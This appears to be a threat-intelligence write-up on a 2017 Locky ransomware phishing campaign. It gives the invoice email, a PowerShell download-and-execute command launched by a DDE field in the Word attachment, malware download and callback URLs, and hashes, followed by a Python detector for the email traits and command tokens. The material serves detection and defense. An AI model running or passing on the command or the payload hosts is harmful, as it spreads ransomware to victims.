2017-10-24: #locky email phishing campaign "Your Invoice xxxxxx"
Email sample:
----------------------------------------------------------------------------------------------------------------
From: "Anna" <Anna.Priestman@iscil.org>
Date: Tue, 24 Oct 2017 17:23:04 +0700
Subject: Your Invoice 99707
Your Invoice is attached.
If you feel you have received this email in error, please reply to this email to inform us of any necessary corrections.
Invoice: Invoice_file_54654.doc
----------------------------------------------------------------------------------------------------------------
- the email does not have a To: header
- the subject is "Your Invoice <5-6 digits>"
- the attached file "Invoice_file_<5-6 digits>.doc" is an MS Word document containing a DDE exploit which executes the following command:
C:\\Windows\\System32\\cmd.exe "/k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(' http://transmercasa.com/JHGGsdsw6')).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr"
The command tries to download an additional PowerShell script from one of the following locations:
http://transmercasa.com/JHGGsdsw6
http://urcho.com/JHGGsdsw6
This PowerShell script downloads the malware loader from one of:
http://tatianadecastelbajac.fr/kjhgFG
http://video.rb-webdev.de/kjhgFG
http://themclarenfamily.com/kjhgFG
Malware loader:
- SHA256: 6106d1b5963feb632eee28aaee5b68e85aef1d090c5e5ef2899b3a0f1a3f7c5b, MD5: eae849f6510db451f4fbdb780b5d49aa
- VT: https://www.virustotal.com/en/file/6106d1b5963feb632eee28aaee5b68e85aef1d090c5e5ef2899b3a0f1a3f7c5b/analysis/1508841473/
- HA (doc file): https://www.reverse.it/sample/ea77730c72da80c9f375b8474ff73af189429a0d1e4b92c6af7341391f73edae?environmentId=100
- the loader checks in via a POST request to http://gdiscoun.org
- the loader downloads the encoded malware from http://webhotell.enivest.no/cuYT39.enc
Malware:
- locky, .asasin variant
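The three email traits and the DDE-launched command line listed above translate directly into mail-gateway and process-creation checks. The following Python is an added example (not part of the original note); the message it parses is a constructed stand-in modelled on the sample, and the token list for the command line is the author's own choice of distinctive fragments from the command shown above.

```python
import re
from email import message_from_string

# Traits listed in the campaign notes: no To: header, subject
# "Your Invoice <5-6 digits>", attachment "Invoice_file_<5-6 digits>.doc".
SUBJECT_RE = re.compile(r"^Your Invoice \d{5,6}$")
ATTACH_RE = re.compile(r"^Invoice_file_\d{5,6}\.doc$", re.IGNORECASE)

# Tokens of the command the DDE field launches: powershell with -NonI -NoP,
# a Net.WebRequest download, and "powershell -e" run on the downloaded text.
DDE_TOKENS = ("powershell", "-noni", "-nop", "net.webrequest", " -e ")

def match_campaign(raw: str) -> list:
    """Return the campaign traits found in a raw RFC 822 message ([] = no match)."""
    msg = message_from_string(raw)
    hits = []
    if msg.get("To") is None:
        hits.append("missing To header")
    if SUBJECT_RE.match(msg.get("Subject", "").strip()):
        hits.append("subject pattern")
    # get_filename() reads Content-Disposition filename= or Content-Type name=
    names = [p.get_filename() for p in msg.walk() if p.get_filename()]
    if any(ATTACH_RE.match(name) for name in names):
        hits.append("attachment name pattern")
    return hits

def match_dde_cmdline(cmdline: str) -> bool:
    """True when a process command line carries every token of the DDE payload."""
    lowered = cmdline.lower()
    return all(token in lowered for token in DDE_TOKENS)

# Constructed sample modelled on the email above; the attachment body is a stub.
SAMPLE = """\
From: "Anna" <Anna.Priestman@iscil.org>
Subject: Your Invoice 99707
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: application/msword
Content-Disposition: attachment; filename="Invoice_file_54654.doc"

(stub)
--b1--
"""

if __name__ == "__main__":
    print(match_campaign(SAMPLE))  # ['missing To header', 'subject pattern', 'attachment name pattern']
```

In practice the mail check belongs in the gateway's quarantine rule set and the command-line check in an EDR or Sysmon event 1 query over Word-spawned child processes.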